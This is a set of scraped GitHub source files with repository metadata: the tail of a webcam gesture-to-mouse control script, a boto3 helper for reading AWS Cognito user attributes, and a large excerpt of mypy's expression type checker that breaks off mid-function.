if bc[0]-yp[0]>130 and bc[1]-yp[1]>170 and bc[1]-rc[1]<40:
out[0] = 'ONOFF'
return out
elif leftHand and checkActionHistory( actionHistory, 'ONOFF'):
if yp[0]-bc[0]>130 and bc[1]-yp[1]>170 and bc[1]-rc[1]<40:
out[0] = 'ONOFF'
return out
if distance(yp,rc)<50 and distance(yp,bc)<50 and distance(rc,bc)<50 :
out[0] = 'drag'
out[1] = 'true'
return out
elif distance(rc,bc)<40:
out[0] = 'left'
return out
elif distance(yp,rc)<40 and checkActionHistory( actionHistory, 'right'):
out[0] = 'right'
return out
elif distance(yp,rc)>40 and rc[1]-bc[1]>120:
out[0] = 'down'
return out
elif bc[1]-rc[1]>110:
out[0] = 'up'
return out
else:
return out
else:
out[0] = -1
return out
# Movement of cursor on screen, left click, right click,scroll up, scroll down
# and dragging actions are performed here based on value stored in 'action'.
def performAction( yp, rc, bc, action, drag, perform):
if action == 'ONOFF':
perform = not perform
print perform
if perform:
print 'Mouse simulation ON...'
else:
print 'Mouse simulation OFF...'
if perform:
if not leftHand:
cursor[0] = 4*(yp[0]-110)
else:
cursor[0] = 4*(yp[0]-50)
cursor[1] = 4*(yp[1]-120)
if action == 'move':
if not leftHand:
if yp[0]>110 and yp[0]<590 and yp[1]>120 and yp[1]<390:
pyautogui.moveTo(cursor[0],cursor[1])
elif yp[0]<110 and yp[1]>120 and yp[1]<390:
pyautogui.moveTo( 8 , cursor[1])
elif yp[0]>590 and yp[1]>120 and yp[1]<390:
pyautogui.moveTo(1912, cursor[1])
elif yp[0]>110 and yp[0]<590 and yp[1]<120:
pyautogui.moveTo(cursor[0] , 8)
elif yp[0]>110 and yp[0]<590 and yp[1]>390:
pyautogui.moveTo(cursor[0] , 1072)
elif yp[0]<110 and yp[1]<120:
pyautogui.moveTo(8, 8)
elif yp[0]<110 and yp[1]>390:
pyautogui.moveTo(8, 1072)
elif yp[0]>590 and yp[1]>390:
pyautogui.moveTo(1912, 1072)
else:
pyautogui.moveTo(1912, 8)
else:
if yp[0]>50 and yp[0]<530 and yp[1]>120 and yp[1]<390:
pyautogui.moveTo(cursor[0],cursor[1])
elif yp[0]<50 and yp[1]>120 and yp[1]<390:
pyautogui.moveTo( 8 , cursor[1])
elif yp[0]>530 and yp[1]>120 and yp[1]<390:
pyautogui.moveTo(1912, cursor[1])
elif yp[0]>50 and yp[0]<530 and yp[1]<120:
pyautogui.moveTo(cursor[0] , 8)
elif yp[0]>50 and yp[0]<530 and yp[1]>390:
pyautogui.moveTo(cursor[0] , 1072)
elif yp[0]<50 and yp[1]<120:
pyautogui.moveTo(8, 8)
elif yp[0]<50 and yp[1]>390:
pyautogui.moveTo(8, 1072)
elif yp[0]>530 and yp[1]>390:
pyautogui.moveTo(1912, 1072)
else:
pyautogui.moveTo(1912, 8)
elif action == 'left':
pyautogui.click(button = 'left')
elif action == 'right':
pyautogui.click(button = 'right')
time.sleep(0.3)
elif action == 'up':
pyautogui.scroll(5)
# time.sleep(0.3)
elif action == 'down':
pyautogui.scroll(-5)
# time.sleep(0.3)
elif action == 'drag' and drag == 'true':
global y_pos
drag = 'false'
pyautogui.mouseDown()
while(1):
k = cv2.waitKey(10) & 0xFF
changeStatus(k)
_, frameinv = cap.read()
# flip horizontaly to get mirror image in camera
frame = cv2.flip( frameinv, 1)
hsv = cv2.cvtColor( frame, cv2.COLOR_BGR2HSV)
b_mask = makeMask( hsv, blue_range)
r_mask = makeMask( hsv, red_range)
y_mask = makeMask( hsv, yellow_range)
py_pos = y_pos
b_cen = drawCentroid( frame, b_area, b_mask, showCentroid)
r_cen = drawCentroid( frame, r_area, r_mask, showCentroid)
y_cen = drawCentroid( frame, y_area, y_mask, showCentroid)
if py_pos[0]!=-1 and y_cen[0]!=-1:
y_pos = setCursorPos(y_cen, py_pos)
performAction(y_pos, r_cen, b_cen, 'move', drag, perform)
cv2.imshow('Frame', frame)
if distance(y_pos,r_cen)>60 or distance(y_pos,b_cen)>60 or distance(r_cen,b_cen)>60:
break
pyautogui.mouseUp()
return perform
cap = cv2.VideoCapture(0)
print '**********************************************************************'
print ' You have entered calibration mode.'
print ' Use the trackbars to calibrate and press SPACE when done.'
print ' Press D to use the default settings.'
print '**********************************************************************'
yellow_range = calibrateColor('Yellow', yellow_range)
red_range = calibrateColor('Red', red_range)
blue_range = calibrateColor('Blue', blue_range)
print ' Calibration Successfull...'
cv2.namedWindow('Frame')
print '**********************************************************************'
print ' Press P to turn ON and OFF mouse simulation.'
print ' Press L to turn ON and OFF left-handed user mode.'
print ' Press C to display the centroid of various colours.'
print ' Press R to recalibrate color ranges.'
print ' Press ESC to exit.'
print '**********************************************************************'
while(1):
k = cv2.waitKey(10) & 0xFF
changeStatus(k)
_, frameinv = cap.read()
# flip horizontaly to get mirror image in camera
frame = cv2.flip( frameinv, 1)
hsv = cv2.cvtColor( frame, cv2.COLOR_BGR2HSV)
b_mask = makeMask( hsv, blue_range)
r_mask = makeMask( hsv, red_range)
y_mask = makeMask( hsv, yellow_range)
py_pos = y_pos
b_cen = drawCentroid( frame, b_area, b_mask, showCentroid)
r_cen = drawCentroid( frame, r_area, r_mask, showCentroid)
y_cen = drawCentroid( frame, y_area, y_mask, showCentroid)
if py_pos[0]!=-1 and y_cen[0]!=-1 and y_pos[0]!=-1:
y_pos = setCursorPos(y_cen, py_pos)
output = chooseAction(y_pos, r_cen, b_cen, actionHistory)
actionHistory = makeActionHistory( actionHistory, output[0])
print output[0]
if output[0]!=-1:
perform = performAction(y_pos, r_cen, b_cen, output[0], output[1], perform)
cv2.imshow('Frame', frame)
if k == 27:
break
cv2.destroyAllWindows()
| [
"noreply@github.com"
] | noreply@github.com |
3e74debc23e55b4b8d6a39cd6b30e66149ba4444 | 986ce59a572a9e3d9f606c4fcbec256776cce47a | /src/utils/cognitoUtils.py | dee82673ac05f95a362c2f596929cfee88be472d | [] | no_license | fbambusi/ido-measures-api | ce92f8f6e058e455a17d9cc55ac7f958440a2bdb | 73ba90a2800a7c086a694f170e24a35e4e41f938 | refs/heads/master | 2023-02-06T11:33:24.319122 | 2020-12-24T14:28:42 | 2020-12-24T14:28:42 | 324,167,416 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,034 | py | import os
import json
import boto3
from botocore.config import Config
def get_client():
my_config = Config(
region_name='eu-central-1',
)
uip = ("a/a/"+os.environ.get("COGNITO_POOL", 'eu-central-1_sPMQnKBGz')).split("/")[-1]
client = boto3.client('cognito-idp', config=my_config)
return client, uip
attribute_names_in_cognito_to_attribute_names_in_response = {
"custom:pots": {"rep_name": "pots", "default_value": "[]", "old_name": "pots"},
"custom:accepted_t_c": {"rep_name": "accepted_terms_and_conditions", "default_value": "REJECTED",
"old_name": "accepted_conditions"},
"custom:accepted_profilation": {"rep_name": "accepted_profilation", "default_value": "REJECTED",
"old_name": "accepted_profilation"},
"custom:accepted_marketing": {"rep_name": "accepted_marketing", "default_value": "REJECTED",
"old_name": "accepted_marketing"},
"custom:has_sensors": {"rep_name": "has_sensors", "default_value": "FALSE",
"old_name": "hasAssociatedPots"}
}
def get_current_conito_user(user_id):
client, pool_id = get_client()
response = client.admin_get_user(
UserPoolId=pool_id,
Username=user_id
)
return response,client
def get_user_rep(user_id):
response,client=get_current_conito_user(user_id)
rep = {"id": f"users/{user_id}"}
for att_name, features in attribute_names_in_cognito_to_attribute_names_in_response.items():
val = get_attribute_from_cognito_response(response, att_name, features["default_value"])
rep[features["rep_name"]] = val
rep["pots"] = json.loads(rep["pots"])
return rep
def get_attribute_from_cognito_response(cognito_response, attribute_name, default_value="REJECTED"):
atts = cognito_response["UserAttributes"]
elems = list(filter(lambda p: p["Name"] == attribute_name, atts))
if elems:
return elems[0]["Value"]
return default_value
| [
"fbambusi@github.com"
] | fbambusi@github.com |
175006eb5905eb05d3eff2e0c2859795a73c2c91 | 7e2d10ed5b62aa908f1facec1400c6b59314878e | /.venv/lib/python3.7/site-packages/mypy/checkexpr.py | 45e302f6595b20685e9aa4c77e360424d06d5cde | [] | no_license | iphysresearch/watchlist | dfe0370ae80d1ab0d4333af445bec9eb80a2ddde | 214a18d406e3b173cffa6eb2f5250d4553eda9f7 | refs/heads/master | 2020-04-11T20:19:16.424183 | 2019-01-14T17:36:09 | 2019-01-14T17:36:09 | 162,066,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175,805 | py | """Expression type checker. This file is conceptually part of TypeChecker."""
from collections import OrderedDict
from contextlib import contextmanager
from typing import (
cast, Dict, Set, List, Tuple, Callable, Union, Optional, Iterable,
Sequence, Iterator
)
MYPY = False
if MYPY:
from typing import ClassVar
from typing_extensions import Final
from mypy.errors import report_internal_error
from mypy.typeanal import (
has_any_from_unimported_type, check_for_explicit_any, set_any_tvars, expand_type_alias
)
from mypy.types import (
Type, AnyType, CallableType, Overloaded, NoneTyp, TypeVarDef,
TupleType, TypedDictType, Instance, TypeVarType, ErasedType, UnionType,
PartialType, DeletedType, UninhabitedType, TypeType, TypeOfAny,
true_only, false_only, is_named_instance, function_type, callable_type, FunctionLike,
StarType, is_optional, remove_optional, is_invariant_instance
)
from mypy.nodes import (
NameExpr, RefExpr, Var, FuncDef, OverloadedFuncDef, TypeInfo, CallExpr,
MemberExpr, IntExpr, StrExpr, BytesExpr, UnicodeExpr, FloatExpr,
OpExpr, UnaryExpr, IndexExpr, CastExpr, RevealExpr, TypeApplication, ListExpr,
TupleExpr, DictExpr, LambdaExpr, SuperExpr, SliceExpr, Context, Expression,
ListComprehension, GeneratorExpr, SetExpr, MypyFile, Decorator,
ConditionalExpr, ComparisonExpr, TempNode, SetComprehension,
DictionaryComprehension, ComplexExpr, EllipsisExpr, StarExpr, AwaitExpr, YieldExpr,
YieldFromExpr, TypedDictExpr, PromoteExpr, NewTypeExpr, NamedTupleExpr, TypeVarExpr,
TypeAliasExpr, BackquoteExpr, EnumCallExpr, TypeAlias, SymbolNode,
ARG_POS, ARG_OPT, ARG_NAMED, ARG_STAR, ARG_STAR2, MODULE_REF, LITERAL_TYPE, REVEAL_TYPE
)
from mypy.literals import literal
from mypy import nodes
import mypy.checker
from mypy import types
from mypy.sametypes import is_same_type
from mypy.erasetype import replace_meta_vars, erase_type
from mypy.messages import MessageBuilder
from mypy import messages
from mypy.infer import infer_type_arguments, infer_function_type_arguments
from mypy import join
from mypy.meet import narrow_declared_type
from mypy.subtypes import (
is_subtype, is_proper_subtype, is_equivalent, find_member, non_method_protocol_members,
)
from mypy import applytype
from mypy import erasetype
from mypy.checkmember import analyze_member_access, type_object_type
from mypy.argmap import ArgTypeExpander, map_actuals_to_formals, map_formals_to_actuals
from mypy.checkstrformat import StringFormatterChecker
from mypy.expandtype import expand_type, expand_type_by_instance, freshen_function_type_vars
from mypy.util import split_module_names
from mypy.typevars import fill_typevars
from mypy.visitor import ExpressionVisitor
from mypy.plugin import Plugin, MethodContext, MethodSigContext, FunctionContext
from mypy.typeanal import make_optional_type
# Type of callback used for checking individual function arguments. See
# check_args() below for details. The arguments are, in order: caller arg type,
# original caller arg type, caller arg index, callee arg type, caller arg count,
# callee arg index, the callee callable, context, and the message builder.
ArgChecker = Callable[[Type, Type, int, Type, int, int, CallableType, Context, MessageBuilder],
                      None]

# Maximum nesting level for union math in overloads; setting this to large values
# may cause performance issues. The reason is that although the union math algorithm
# we use nicely captures most corner cases, its worst case complexity is exponential,
# see https://github.com/python/mypy/pull/5255#discussion_r196896335 for discussion.
MAX_UNIONS = 5  # type: Final
class TooManyUnions(Exception):
    """Indicates that we need to stop splitting unions in an attempt
    to match an overload in order to save performance.

    Raised when the nesting level of union splits exceeds MAX_UNIONS.
    """
def extract_refexpr_names(expr: RefExpr) -> Set[str]:
    """Recursively extracts all module references from a reference expression.

    Walks a dotted reference chain (e.g. ``a.b.c``) from the outermost member
    expression inwards, collecting the names of all modules it passes through.

    Note that currently, the only two subclasses of RefExpr are NameExpr and
    MemberExpr."""
    output = set()  # type: Set[str]
    # Keep descending while the current expression is a module reference or
    # has a resolved fully qualified name.
    while expr.kind == MODULE_REF or expr.fullname is not None:
        if expr.kind == MODULE_REF and expr.fullname is not None:
            # If it's None, something's wrong (perhaps due to an
            # import cycle or a suppressed error). For now we just
            # skip it.
            output.add(expr.fullname)

        if isinstance(expr, NameExpr):
            # Innermost part of the chain reached: record its module and stop.
            is_suppressed_import = isinstance(expr.node, Var) and expr.node.is_suppressed_import
            if isinstance(expr.node, TypeInfo):
                # Reference to a class or a nested class
                output.update(split_module_names(expr.node.module_name))
            elif expr.fullname is not None and '.' in expr.fullname and not is_suppressed_import:
                # Everything else (that is not a silenced import within a class)
                output.add(expr.fullname.rsplit('.', 1)[0])
            break
        elif isinstance(expr, MemberExpr):
            # Step one level inward (from 'a.b.c' to 'a.b'); stop if the base
            # is not itself a reference expression.
            if isinstance(expr.expr, RefExpr):
                expr = expr.expr
            else:
                break
        else:
            raise AssertionError("Unknown RefExpr subclass: {}".format(type(expr)))
    return output
class Finished(Exception):
    """Raised if we can terminate overload argument check early (no match)."""
class ExpressionChecker(ExpressionVisitor[Type]):
    """Expression type checker.

    This class works closely together with checker.TypeChecker.
    """

    # Some services are provided by a TypeChecker instance.
    chk = None  # type: mypy.checker.TypeChecker
    # This is shared with TypeChecker, but stored also here for convenience.
    msg = None  # type: MessageBuilder
    # Type context for type inference (a stack; the innermost context is last)
    type_context = None  # type: List[Optional[Type]]

    # Helper for checking str.format() / %-interpolation calls
    strfrm_checker = None  # type: StringFormatterChecker
    # Active plugin used for special-casing library functions
    plugin = None  # type: Plugin
    def __init__(self,
                 chk: 'mypy.checker.TypeChecker',
                 msg: MessageBuilder,
                 plugin: Plugin) -> None:
        """Construct an expression type checker."""
        self.chk = chk
        self.msg = msg
        self.plugin = plugin
        # Start with an empty (None) type context.
        self.type_context = [None]
        # Temporary overrides for expression types. This is currently
        # used by the union math in overloads.
        # TODO: refactor this to use a pattern similar to one in
        # multiassign_from_union, or maybe even combine the two?
        self.type_overrides = {}  # type: Dict[Expression, Type]
        # Note: must be created after self.chk and self.msg are set above.
        self.strfrm_checker = StringFormatterChecker(self, self.chk, self.msg)
def visit_name_expr(self, e: NameExpr) -> Type:
"""Type check a name expression.
It can be of any kind: local, member or global.
"""
self.chk.module_refs.update(extract_refexpr_names(e))
result = self.analyze_ref_expr(e)
return self.narrow_type_from_binder(e, result)
    def analyze_ref_expr(self, e: RefExpr, lvalue: bool = False) -> Type:
        """Return the type of the entity referred to by a reference expression.

        Dispatches on the kind of symbol node the expression resolves to
        (variable, function, class, module, decorator, or type alias).
        If 'lvalue' is true, the expression appears as an assignment target.
        """
        result = None  # type: Optional[Type]
        node = e.node
        if isinstance(node, Var):
            # Variable reference.
            result = self.analyze_var_ref(node, e)
            if isinstance(result, PartialType):
                result = self.chk.handle_partial_var_type(result, lvalue, node, e)
        elif isinstance(node, FuncDef):
            # Reference to a global function.
            result = function_type(node, self.named_type('builtins.function'))
        elif isinstance(node, OverloadedFuncDef) and node.type is not None:
            # node.type is None when there are multiple definitions of a function
            # and it's decorated by something that is not typing.overload
            result = node.type
        elif isinstance(node, TypeInfo):
            # Reference to a type object.
            result = type_object_type(node, self.named_type)
            if isinstance(result, CallableType) and isinstance(result.ret_type, Instance):
                # We need to set correct line and column
                # TODO: always do this in type_object_type by passing the original context
                result.ret_type.line = e.line
                result.ret_type.column = e.column
            if isinstance(self.type_context[-1], TypeType):
                # This is the type in a Type[] expression, so substitute type
                # variables with Any.
                result = erasetype.erase_typevars(result)
        elif isinstance(node, MypyFile):
            # Reference to a module object.
            try:
                result = self.named_type('types.ModuleType')
            except KeyError:
                # In test cases 'types' may not be available.
                # Fall back to a dummy 'object' type instead to
                # avoid a crash.
                result = self.named_type('builtins.object')
        elif isinstance(node, Decorator):
            # A decorated function: use the type of the underlying variable.
            result = self.analyze_var_ref(node.var, e)
        elif isinstance(node, TypeAlias):
            # Something that refers to a type alias appears in runtime context.
            # Note that we suppress bogus errors for alias redefinitions,
            # they are already reported in semanal.py.
            result = self.alias_type_in_runtime_context(node.target, node.alias_tvars,
                                                        node.no_args, e,
                                                        alias_definition=e.is_alias_rvalue
                                                        or lvalue)
        else:
            # Unknown reference; use any type implicitly to avoid
            # generating extra type errors.
            result = AnyType(TypeOfAny.from_error)
        assert result is not None
        return result
def analyze_var_ref(self, var: Var, context: Context) -> Type:
if var.type:
return var.type
else:
if not var.is_ready and self.chk.in_checked_function():
self.chk.handle_cannot_determine_type(var.name(), context)
# Implicit 'Any' type.
return AnyType(TypeOfAny.special_form)
def visit_call_expr(self, e: CallExpr, allow_none_return: bool = False) -> Type:
"""Type check a call expression."""
if e.analyzed:
if isinstance(e.analyzed, NamedTupleExpr) and not e.analyzed.is_typed:
# Type check the arguments, but ignore the results. This relies
# on the typeshed stubs to type check the arguments.
self.visit_call_expr_inner(e)
# It's really a special form that only looks like a call.
return self.accept(e.analyzed, self.type_context[-1])
return self.visit_call_expr_inner(e, allow_none_return=allow_none_return)
    def visit_call_expr_inner(self, e: CallExpr, allow_none_return: bool = False) -> Type:
        """Type check an ordinary call expression.

        Handles TypedDict constructor calls, isinstance()/issubclass() checks,
        lambda callees, plugin lookup of the callee's full name, and warnings
        for calls to functions that always return None.
        """
        if isinstance(e.callee, NameExpr) and isinstance(e.callee.node, TypeInfo) and \
                e.callee.node.typeddict_type is not None:
            # Use named fallback for better error messages.
            typeddict_type = e.callee.node.typeddict_type.copy_modified(
                fallback=Instance(e.callee.node, []))
            return self.check_typeddict_call(typeddict_type, e.arg_kinds, e.arg_names, e.args, e)
        if (isinstance(e.callee, NameExpr) and e.callee.name in ('isinstance', 'issubclass')
                and len(e.args) == 2):
            # Reject types that can't be used as the second argument of
            # isinstance()/issubclass(): parameterized generics/aliases,
            # TypedDicts and NewTypes.
            for typ in mypy.checker.flatten(e.args[1]):
                if isinstance(typ, NameExpr):
                    node = None
                    try:
                        node = self.chk.lookup_qualified(typ.name)
                    except KeyError:
                        # Undefined names should already be reported in semantic analysis.
                        pass
                if ((isinstance(typ, IndexExpr)
                        and isinstance(typ.analyzed, (TypeApplication, TypeAliasExpr)))
                        or (isinstance(typ, NameExpr) and node and
                            isinstance(node.node, TypeAlias) and not node.node.no_args)):
                    self.msg.type_arguments_not_allowed(e)
                if isinstance(typ, RefExpr) and isinstance(typ.node, TypeInfo):
                    if typ.node.typeddict_type:
                        self.msg.fail(messages.CANNOT_ISINSTANCE_TYPEDDICT, e)
                    elif typ.node.is_newtype:
                        self.msg.fail(messages.CANNOT_ISINSTANCE_NEWTYPE, e)
        self.try_infer_partial_type(e)
        type_context = None
        if isinstance(e.callee, LambdaExpr):
            # For a lambda callee, derive its type context from the actual
            # argument types at this call site.
            formal_to_actual = map_actuals_to_formals(
                e.arg_kinds, e.arg_names,
                e.callee.arg_kinds, e.callee.arg_names,
                lambda i: self.accept(e.args[i]))
            arg_types = [join.join_type_list([self.accept(e.args[j]) for j in formal_to_actual[i]])
                         for i in range(len(e.callee.arg_kinds))]
            type_context = CallableType(arg_types, e.callee.arg_kinds, e.callee.arg_names,
                                        ret_type=self.object_type(),
                                        fallback=self.named_type('builtins.function'))
        callee_type = self.accept(e.callee, type_context, always_allow_any=True)
        if (self.chk.options.disallow_untyped_calls and
                self.chk.in_checked_function() and
                isinstance(callee_type, CallableType)
                and callee_type.implicit):
            return self.msg.untyped_function_call(callee_type, e)
        # Figure out the full name of the callee for plugin lookup.
        object_type = None
        if not isinstance(e.callee, RefExpr):
            fullname = None
        else:
            fullname = e.callee.fullname
            if (isinstance(e.callee.node, TypeAlias) and
                    isinstance(e.callee.node.target, Instance)):
                # Calls through an alias resolve to the aliased class.
                fullname = e.callee.node.target.type.fullname()
            if (fullname is None
                    and isinstance(e.callee, MemberExpr)
                    and e.callee.expr in self.chk.type_map
                    and isinstance(callee_type, FunctionLike)):
                # For method calls we include the defining class for the method
                # in the full name (example: 'typing.Mapping.get').
                callee_expr_type = self.chk.type_map[e.callee.expr]
                fullname = self.method_fullname(callee_expr_type, e.callee.name)
                if fullname is not None:
                    object_type = callee_expr_type
        ret_type = self.check_call_expr_with_callee_type(callee_type, e, fullname, object_type)
        if isinstance(e.callee, RefExpr) and len(e.args) == 2:
            # Additional checks for runtime protocol tests.
            if e.callee.fullname in ('builtins.isinstance', 'builtins.issubclass'):
                self.check_runtime_protocol_test(e)
            if e.callee.fullname == 'builtins.issubclass':
                self.check_protocol_issubclass(e)
        if isinstance(ret_type, UninhabitedType) and not ret_type.ambiguous:
            # The call can never return normally (e.g. returns NoReturn).
            self.chk.binder.unreachable()
        # Warn on calls to functions that always return None. The check
        # of ret_type is both a common-case optimization and prevents reporting
        # the error in dynamic functions (where it will be Any).
        if (not allow_none_return and isinstance(ret_type, NoneTyp)
                and self.always_returns_none(e.callee)):
            self.chk.msg.does_not_return_value(callee_type, e)
            return AnyType(TypeOfAny.from_error)
        return ret_type
def method_fullname(self, object_type: Type, method_name: str) -> Optional[str]:
"""Convert a method name to a fully qualified name, based on the type of the object that
it is invoked on. Return `None` if the name of `object_type` cannot be determined.
"""
if isinstance(object_type, CallableType) and object_type.is_type_obj():
# For class method calls, object_type is a callable representing the class object.
# We "unwrap" it to a regular type, as the class/instance method difference doesn't
# affect the fully qualified name.
object_type = object_type.ret_type
type_name = None
if isinstance(object_type, Instance):
type_name = object_type.type.fullname()
elif isinstance(object_type, TypedDictType):
info = object_type.fallback.type.get_containing_type_info(method_name)
type_name = info.fullname() if info is not None else None
elif isinstance(object_type, TupleType):
type_name = object_type.fallback.type.fullname()
if type_name is not None:
return '{}.{}'.format(type_name, method_name)
else:
return None
def always_returns_none(self, node: Expression) -> bool:
"""Check if `node` refers to something explicitly annotated as only returning None."""
if isinstance(node, RefExpr):
if self.defn_returns_none(node.node):
return True
if isinstance(node, MemberExpr) and node.node is None: # instance or class attribute
typ = self.chk.type_map.get(node.expr)
if isinstance(typ, Instance):
info = typ.type
elif (isinstance(typ, CallableType) and typ.is_type_obj() and
isinstance(typ.ret_type, Instance)):
info = typ.ret_type.type
else:
return False
sym = info.get(node.name)
if sym and self.defn_returns_none(sym.node):
return True
return False
def defn_returns_none(self, defn: Optional[SymbolNode]) -> bool:
"""Check if `defn` can _only_ return None."""
if isinstance(defn, FuncDef):
return (isinstance(defn.type, CallableType) and
isinstance(defn.type.ret_type, NoneTyp))
if isinstance(defn, OverloadedFuncDef):
return all(isinstance(item.type, CallableType) and
isinstance(item.type.ret_type, NoneTyp) for item in defn.items)
if isinstance(defn, Var):
if (not defn.is_inferred and isinstance(defn.type, CallableType) and
isinstance(defn.type.ret_type, NoneTyp)):
return True
if isinstance(defn.type, Instance):
sym = defn.type.type.get('__call__')
if sym and self.defn_returns_none(sym.node):
return True
return False
def check_runtime_protocol_test(self, e: CallExpr) -> None:
for expr in mypy.checker.flatten(e.args[1]):
tp = self.chk.type_map[expr]
if (isinstance(tp, CallableType) and tp.is_type_obj() and
tp.type_object().is_protocol and
not tp.type_object().runtime_protocol):
self.chk.fail('Only @runtime protocols can be used with'
' instance and class checks', e)
def check_protocol_issubclass(self, e: CallExpr) -> None:
for expr in mypy.checker.flatten(e.args[1]):
tp = self.chk.type_map[expr]
if (isinstance(tp, CallableType) and tp.is_type_obj() and
tp.type_object().is_protocol):
attr_members = non_method_protocol_members(tp.type_object())
if attr_members:
self.chk.msg.report_non_method_protocol(tp.type_object(),
attr_members, e)
    def check_typeddict_call(self, callee: TypedDictType,
                             arg_kinds: List[int],
                             arg_names: Sequence[Optional[str]],
                             args: List[Expression],
                             context: Context) -> Type:
        """Type check a TypedDict constructor call.

        Supported call shapes: all-keyword arguments, a single positional
        dict literal (possibly wrapped in a dict(...) call), or no arguments
        at all. Any other shape is reported as an error.
        """
        if len(args) >= 1 and all([ak == ARG_NAMED for ak in arg_kinds]):
            # ex: Point(x=42, y=1337)
            assert all(arg_name is not None for arg_name in arg_names)
            item_names = cast(List[str], arg_names)
            item_args = args
            return self.check_typeddict_call_with_kwargs(
                callee, OrderedDict(zip(item_names, item_args)), context)
        if len(args) == 1 and arg_kinds[0] == ARG_POS:
            unique_arg = args[0]
            if isinstance(unique_arg, DictExpr):
                # ex: Point({'x': 42, 'y': 1337})
                return self.check_typeddict_call_with_dict(callee, unique_arg, context)
            if isinstance(unique_arg, CallExpr) and isinstance(unique_arg.analyzed, DictExpr):
                # ex: Point(dict(x=42, y=1337))
                return self.check_typeddict_call_with_dict(callee, unique_arg.analyzed, context)
        if len(args) == 0:
            # ex: EmptyDict()
            return self.check_typeddict_call_with_kwargs(
                callee, OrderedDict(), context)
        self.chk.fail(messages.INVALID_TYPEDDICT_ARGS, context)
        return AnyType(TypeOfAny.from_error)
def check_typeddict_call_with_dict(self, callee: TypedDictType,
kwargs: DictExpr,
context: Context) -> Type:
item_args = [item[1] for item in kwargs.items]
item_names = [] # List[str]
for item_name_expr, item_arg in kwargs.items:
if not isinstance(item_name_expr, StrExpr):
key_context = item_name_expr or item_arg
self.chk.fail(messages.TYPEDDICT_KEY_MUST_BE_STRING_LITERAL, key_context)
return AnyType(TypeOfAny.from_error)
item_names.append(item_name_expr.value)
return self.check_typeddict_call_with_kwargs(
callee, OrderedDict(zip(item_names, item_args)), context)
    def check_typeddict_call_with_kwargs(self, callee: TypedDictType,
                                         kwargs: 'OrderedDict[str, Expression]',
                                         context: Context) -> Type:
        """Type check a TypedDict constructor call given its items as keyword args.

        Verify that every required key is present, that no key outside the
        TypedDict definition is given, and that each value is assignable to
        the declared item type. Returns `callee` on success.
        """
        # The given keys must form a superset of the required keys and a
        # subset of all declared keys.
        if not (callee.required_keys <= set(kwargs.keys()) <= set(callee.items.keys())):
            expected_keys = [key for key in callee.items.keys()
                             if key in callee.required_keys or key in kwargs.keys()]
            actual_keys = kwargs.keys()
            self.msg.unexpected_typeddict_keys(
                callee,
                expected_keys=expected_keys,
                actual_keys=list(actual_keys),
                context=context)
            return AnyType(TypeOfAny.from_error)
        for (item_name, item_expected_type) in callee.items.items():
            if item_name in kwargs:
                item_value = kwargs[item_name]
                # Each provided value must be compatible with the declared
                # type of its item; errors are reported per item.
                self.chk.check_simple_assignment(
                    lvalue_type=item_expected_type, rvalue=item_value, context=item_value,
                    msg=messages.INCOMPATIBLE_TYPES,
                    lvalue_name='TypedDict item "{}"'.format(item_name),
                    rvalue_name='expression')
        return callee
# Types and methods that can be used to infer partial types.
item_args = {'builtins.list': ['append'],
'builtins.set': ['add', 'discard'],
} # type: ClassVar[Dict[str, List[str]]]
container_args = {'builtins.list': {'extend': ['builtins.list']},
'builtins.dict': {'update': ['builtins.dict']},
'builtins.set': {'update': ['builtins.set', 'builtins.list']},
} # type: ClassVar[Dict[str, Dict[str, List[str]]]]
    def try_infer_partial_type(self, e: CallExpr) -> None:
        """Try to make a variable's partial container type precise from a method call.

        For example, infer List[int] for x from 'x = []; x.append(1)'.
        Only method calls listed in item_args/container_args with a single
        positional argument are considered; otherwise this is a no-op.
        """
        if isinstance(e.callee, MemberExpr) and isinstance(e.callee.expr, RefExpr):
            var = e.callee.expr.node
            if not isinstance(var, Var):
                return
            partial_types = self.chk.find_partial_types(var)
            if partial_types is not None and not self.chk.current_node_deferred:
                partial_type = var.type
                if (partial_type is None or
                        not isinstance(partial_type, PartialType) or
                        partial_type.type is None):
                    # A partial None type -> can't infer anything.
                    return
                typename = partial_type.type.fullname()
                methodname = e.callee.name
                # Sometimes we can infer a full type for a partial List, Dict or Set type.
                # TODO: Don't infer argument expression twice.
                if (typename in self.item_args and methodname in self.item_args[typename]
                        and e.arg_kinds == [ARG_POS]):
                    # Single-item method (e.g. list.append): join the argument
                    # type with any previously accumulated item type.
                    item_type = self.accept(e.args[0])
                    full_item_type = UnionType.make_simplified_union(
                        [item_type, partial_type.inner_types[0]])
                    if mypy.checker.is_valid_inferred_type(full_item_type):
                        var.type = self.chk.named_generic_type(typename, [full_item_type])
                        del partial_types[var]
                elif (typename in self.container_args
                      and methodname in self.container_args[typename]
                      and e.arg_kinds == [ARG_POS]):
                    # Container-merging method (e.g. list.extend): infer from
                    # the argument container's type arguments.
                    arg_type = self.accept(e.args[0])
                    if isinstance(arg_type, Instance):
                        arg_typename = arg_type.type.fullname()
                        if arg_typename in self.container_args[typename][methodname]:
                            full_item_types = [
                                UnionType.make_simplified_union([item_type, prev_type])
                                for item_type, prev_type
                                in zip(arg_type.args, partial_type.inner_types)
                            ]
                            if all(mypy.checker.is_valid_inferred_type(item_type)
                                   for item_type in full_item_types):
                                var.type = self.chk.named_generic_type(typename,
                                                                       list(full_item_types))
                                del partial_types[var]
def apply_function_plugin(self,
arg_types: List[Type],
inferred_ret_type: Type,
arg_kinds: List[int],
formal_to_actual: List[List[int]],
args: List[Expression],
num_formals: int,
fullname: str,
object_type: Optional[Type],
context: Context) -> Type:
"""Use special case logic to infer the return type of a specific named function/method.
Caller must ensure that a plugin hook exists. There are two different cases:
- If object_type is None, the caller must ensure that a function hook exists
for fullname.
- If object_type is not None, the caller must ensure that a method hook exists
for fullname.
Return the inferred return type.
"""
formal_arg_types = [[] for _ in range(num_formals)] # type: List[List[Type]]
formal_arg_exprs = [[] for _ in range(num_formals)] # type: List[List[Expression]]
for formal, actuals in enumerate(formal_to_actual):
for actual in actuals:
formal_arg_types[formal].append(arg_types[actual])
formal_arg_exprs[formal].append(args[actual])
if object_type is None:
# Apply function plugin
callback = self.plugin.get_function_hook(fullname)
assert callback is not None # Assume that caller ensures this
return callback(
FunctionContext(formal_arg_types, inferred_ret_type, formal_arg_exprs,
context, self.chk))
else:
# Apply method plugin
method_callback = self.plugin.get_method_hook(fullname)
assert method_callback is not None # Assume that caller ensures this
return method_callback(
MethodContext(object_type, formal_arg_types,
